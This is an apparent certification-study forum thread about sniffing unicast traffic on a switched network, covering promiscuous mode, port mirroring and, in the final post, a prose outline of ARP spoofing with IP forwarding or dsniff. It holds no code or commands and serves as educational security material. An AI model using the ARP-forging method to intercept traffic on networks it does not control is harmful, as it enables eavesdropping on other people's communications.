Question about packet sniffing through a switch...

qsub

I thought switches don't broadcast any packets recieved from one port destined to another? Inless of course it is a broadcast packet.

So how does one Computer C sniff data that Computer A sent to Computer B through a switch? It does routing through it's MAC filter table doesn't it? So Computer C shouldn't recieve the data.

fondue

I thought switches don't broadcast any packets recieved from one port destined to another? Inless of course it is a broadcast packet.

A broadcast packet is a broadcast packet and will be sent to all ports. The second part of your question describes more of a unicast packet question. The only way to sniff unicast traffic on a switch is to span, port mirror or port monitor the ports you wish to sniff.

Span, port mirror or port monitoring, or whatever the manufacturers want to call it, are available on most high managed switches.

qsub

So pretend you had a SOHO switch, basic 4 port. Data from PC A to PC B can't be sniffed by PC 3?

I thought if your NIC supported something called "permicious mode" or along those lines, it allows you to. But I don't understand how that would exactly work.

Webmaster

spfdz wrote:

I thought if your NIC supported something called "permicious mode" or along those lines, it allows you to. But I don't understand how that would exactly work.

No, PC3 would not be able to sniff traffic between PC1 and PC2 with a NIC in promiscious mode. The term broadcast in this scenario does not relate to broadcasts sent to the IP broadcast address, but to Ethernet being a broadcast network technology. In a non-switched network, all network nodes hear all traffic (layer 2 frames), but only process frames addressed to themselves (unless it has a NIC in promiscious mode, in which case it processes all traffic it hears, even if the destination address doesn't match its own). In a switched network, devices only hear traffic actually addresses to them (or to everyone thru a broadcast address), but not communication between nodes connected to other switch ports. Putting the NIC in promiscious mode wouldn't change a thing because it just doesn't get the traffic on its cable/switchport).

The Switches section in my Security+ Network Devices TechNotes explains it in more detail:
www.techexams.net/technotes/securityplus/network_devices_security.shtml

The Monitoring section on the same page is relevant as well.

seuss_ssues

Sniffing on a switch is possible but is not as easy as sniffing off of a hub. There are several things that can be done to accomplish the task and a good read about the subject is here.

http://www.sans.org/resources/idfaq/switched_network.php

Its really not that difficult to do, and too many people put faith in the fact that "were using switches so we are safe".

Webmaster

Yes, there are other ways to sniff in switched networks, however, simply placing a NIC in promiscious mode will not allow PC3 to sniff traffic between PC1 and PC2.

seuss_ssues wrote:

"were using switches so we are safe"

I even heard a telco claim that years ago. A common misconception that applies to other devices and security technologies as well. But from a CompTIA Security+ point of view, switches provide protection against sniffing. In proper terms: it mitigates the threat of sniffing and decreases the risk. That doesn't mean their safe though

mikeyoung

Fondue actually answered the question, but I don't know if every one got it. You sniff on a switch by mirroring or monitoring (cisco's term) a specific port, several ports or a VLAN. Pretty simple to do really.

Mike

seuss_ssues

Generally port mirroring is used by the administrator or the individual in control of the switch to "monitor" network activity. Yes you could mirror a port and then set a NIC into promiscuous mode and sniff the traffic for that or all ports. But an attacker will probably not have the ability to mirror ports. Also many switches such as all the little linksys cable/dsl routers do not to my knowledge allow port mirroring to occur.

So Fondue gave one example of how it could be done, while the link that i gave talked about several more. Just as with almost everyhting associated with computers there are several methods of doing something.


But as the webmaster stated for most certifications one of the advantages of a switch is that it is unsniffable.

keatron

We can't leave out ARP in this discussion. Forging ARP packets is one of the more common ways to do this. PC3 could send a forged packet to PC1 , telling it that its default gateway has changed to PC3, for example. PC3 then fowards the packets to PC2 as if nothing ever happened.This way, whenever PC1 sends traffic on the network, it will send it to PC3 first, which then forwards the packet on to its original destination. This is very very easy to do from a Linux box if you know how to use kernel-level IP forwarding. And for those who are lazy Dsniff makes it even easier, however this method (as is the case with most out of the box tools) is not very "quiet".